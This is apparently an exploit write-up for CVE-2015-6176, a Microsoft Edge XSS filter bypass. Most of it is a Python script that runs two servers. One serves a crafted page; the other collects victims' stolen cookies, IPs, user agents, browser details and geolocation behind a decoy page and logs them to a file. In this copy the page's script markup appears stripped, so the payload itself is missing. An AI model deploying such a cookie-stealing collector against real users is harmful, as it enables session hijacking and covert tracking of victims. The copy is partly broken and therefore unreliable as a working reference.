# Title: Microsoft Edge XSS Filter Bypass PoC
# Author: nu11secur1ty
# Date: 2025-07-18
# Vendor: Microsoft
# Software: Microsoft Edge Browser
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6176
## Description
This Proof of Concept (PoC) demonstrates a bypass of the XSS (Cross-Site
Scripting) filter in Microsoft Edge. The vulnerability allows attackers to
inject and execute malicious JavaScript despite Edge's built-in XSS
protection mechanisms. The PoC serves a crafted HTML page that steals user
cookies and sends them to an attacker-controlled collector server, bypassing
Edge's filter. The collector server displays a large sea picture as a decoy
while logging the stolen cookies together with IP addresses, user agents,
timestamps, and approximate geographic locations.
This vulnerability is categorized as medium severity due to the potential
for session hijacking and unauthorized actions performed with stolen
cookies. Cookies set with the HttpOnly attribute are not readable from
script and are therefore outside what this technique can collect.
# STATUS: MEDIUM VULNERABILITY
[+]Exploit:
```python
#!/usr/bin/python
# nu11secur1ty CVE-2015-6176
import http.server
import socketserver
import socket
import threading
from urllib import parse
import requests
import datetime
# Listening ports: PORT is used by run_exploit_server for the demonstration
# page, COLLECTOR_PORT by run_collector_server for the logging endpoint.
PORT = 8080
COLLECTOR_PORT = 9000
# HTML page with extended XSS exploit that sends lots of info via Image GET to collector
# NOTE(review): only text nodes are present in this copy; the markup appears
# to have been stripped when the listing was extracted. ExploitHandler
# substitutes the {LOCAL_IP} and {COLLECTOR_PORT} placeholders in this value,
# and neither placeholder occurs in the text below, so that substitution is a
# no-op on this copy.
HTML_CONTENT = b"""
XSS Edge Bypass PoC
XSS Edge Bypass PoC
If this alert appears, XSS is executed.
"""
# Collector page with large sea picture and centered message (Unicode allowed)
# NOTE(review): as above, only the text of the page is present here; no image
# reference survives in this copy.
COLLECTOR_PAGE = """
Collected
Thank you for visiting the collector page 🌊
"""
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
    """Serve the templated demonstration page on ``/`` and ``/index.html``.

    Every other GET path is answered with 404, so the file-serving GET
    behaviour of ``SimpleHTTPRequestHandler`` is not reachable.
    NOTE(review): ``do_HEAD`` is not overridden here, so HEAD requests are
    still handled by the base class - confirm whether that is intended.
    """

    def do_GET(self):
        """Send the page with its placeholders filled in, or a 404.

        ``{LOCAL_IP}`` is replaced with the module-level ``local_ip`` and
        ``{COLLECTOR_PORT}`` with ``COLLECTOR_PORT`` before the bytes are
        written to the client.
        """
        if self.path not in ('/', '/index.html'):
            self.send_error(404)
            return

        # local_ip is assigned in the __main__ block, not in this class.
        substitutions = (
            (b"{LOCAL_IP}", local_ip.encode()),
            (b"{COLLECTOR_PORT}", str(COLLECTOR_PORT).encode()),
        )
        body = HTML_CONTENT
        for placeholder, value in substitutions:
            body = body.replace(placeholder, value)

        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        # Length is taken after substitution so it matches the bytes sent.
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
class CollectorHandler(http.server.BaseHTTPRequestHandler):
    """Receive reports on ``/collect`` and record them.

    On the wire a report is a GET to ``/collect`` whose query string carries
    ``cookie``, ``url``, ``referrer``, ``language``, ``platform``,
    ``timezone`` and ``screen``. The handler adds the peer address, the
    ``User-Agent`` header, a local timestamp and a geolocation string, then
    prints the record and appends it to ``collected_data.log`` in the
    working directory. Any other path gets a 404.

    NOTE(review): every reported value comes from the remote client and is
    written to the console and the log file as received, so line breaks or
    terminal control sequences inside a value land verbatim in both.
    """

    def do_GET(self):
        """Handle one GET: record a report on ``/collect``, 404 otherwise."""
        target = parse.urlparse(self.path)
        if target.path != "/collect":
            self.send_error(404)
            return

        params = parse.parse_qs(target.query)

        def first(name):
            # parse_qs maps each key to a list; a missing key reads as "".
            return params.get(name, [""])[0]

        cookie = first("cookie")
        url = first("url")
        referrer = first("referrer")
        language = first("language")
        platform = first("platform")
        timezone = first("timezone")
        screen = first("screen")

        ip = self.client_address[0]
        user_agent = self.headers.get("User-Agent", "Unknown")
        # Local time of the machine running the collector (naive datetime).
        timestamp = f"{datetime.datetime.now():%Y-%m-%d %H:%M:%S}"
        # NOTE(review): the lookup runs for every /collect request, including
        # requests that carry no cookie value and are therefore not recorded.
        location = self.get_location(ip)

        if cookie:
            details_head = [
                f" URL: {url}",
                f" Referrer: {referrer}",
                f" Language: {language}",
                f" Platform: {platform}",
                f" Timezone: {timezone}",
                f" Screen Resolution: {screen}",
            ]
            details_tail = [
                f" User-Agent: {user_agent}",
                f" Location: {location}",
                "-" * 50,
            ]

            console_lines = [
                f"[{timestamp}] [+] Collected cookie: {cookie}",
                *details_head,
                f" From IP: {ip}",
                *details_tail,
            ]
            print("\n".join(console_lines))

            # Save collected info to a file (append mode, UTF-8).
            record_lines = [
                f"[{timestamp}] Cookie: {cookie}",
                *details_head,
                f" IP: {ip}",
                *details_tail,
            ]
            with open("collected_data.log", "a", encoding="utf-8") as log:
                log.write("\n".join(record_lines) + "\n")

        # The same page is returned whether or not anything was recorded.
        page = COLLECTOR_PAGE.encode('utf-8')
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(page)))
        self.end_headers()
        self.wfile.write(page)

    def get_location(self, ip):
        """Return a "city, region, country (coords: ...)" string for *ip*.

        The address is sent to ``https://ipinfo.io/<ip>/json`` with a
        three-second timeout, so each call discloses the client address to
        that service. Any non-200 answer or any exception yields the fixed
        fallback text instead.
        """
        unavailable = "Location lookup failed or unavailable"
        try:
            resp = requests.get(f"https://ipinfo.io/{ip}/json", timeout=3)
            if resp.status_code != 200:
                return unavailable
            info = resp.json()
            city, region, country, coords = (
                info.get(key, "") for key in ("city", "region", "country", "loc")
            )
            return f"{city}, {region}, {country} (coords: {coords})"
        except Exception:
            # Best-effort lookup: failures are deliberately not reported.
            return unavailable
def get_local_ip():
    """Return the local IPv4 address used for outbound traffic.

    A datagram socket is connected to 8.8.8.8:80 and the address the socket
    was bound to is read back. If anything in that sequence raises, the
    loopback address ``127.0.0.1`` is returned instead.
    """
    # The context manager closes the socket on every exit path.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as probe:
        try:
            probe.connect(("8.8.8.8", 80))
            return probe.getsockname()[0]
        except Exception:
            return "127.0.0.1"
def run_exploit_server():
    """Serve ``ExploitHandler`` on ``PORT`` until the process exits.

    Prints the page URL, built from the module-level ``local_ip``, and then
    blocks in ``serve_forever``.
    """
    # An empty host string binds the listener on all local interfaces.
    bind_address = ("", PORT)
    with socketserver.TCPServer(bind_address, ExploitHandler) as server:
        banner = f"[*] Exploit server running at: http://{local_ip}:{PORT}/index.html"
        print(banner)
        server.serve_forever()
def run_collector_server():
    """Serve ``CollectorHandler`` on ``COLLECTOR_PORT`` until interrupted.

    Prints the ``/collect`` URL, built from the module-level ``local_ip``,
    and then blocks in ``serve_forever``.
    """
    # An empty host string binds the listener on all local interfaces.
    bind_address = ("", COLLECTOR_PORT)
    with socketserver.TCPServer(bind_address, CollectorHandler) as server:
        banner = (
            "[*] Collector server listening for stolen cookies at: "
            f"http://{local_ip}:{COLLECTOR_PORT}/collect"
        )
        print(banner)
        server.serve_forever()
if __name__ == "__main__":
    # local_ip is deliberately module-level: ExploitHandler and both
    # run_*_server functions read it as a global.
    local_ip = get_local_ip()
    try:
        print(f"[*] Your server IP is: {local_ip}")
        # The page server runs in a daemon thread, so it ends with the
        # process; the collector occupies the main thread.
        exploit_thread = threading.Thread(
            daemon=True,
            target=run_exploit_server,
        )
        exploit_thread.start()
        run_collector_server()
    except KeyboardInterrupt:
        # Ctrl-C in the main thread is the only shutdown path handled here.
        print("\n[!] Shutting down servers. Goodbye!")
```
# Video:
[href](https://www.youtube.com/watch?v=T2YLrFsvXOc)
# Source:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176)
# Buy me a coffee if you are not ashamed:
[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
# Time spent:
03:35:00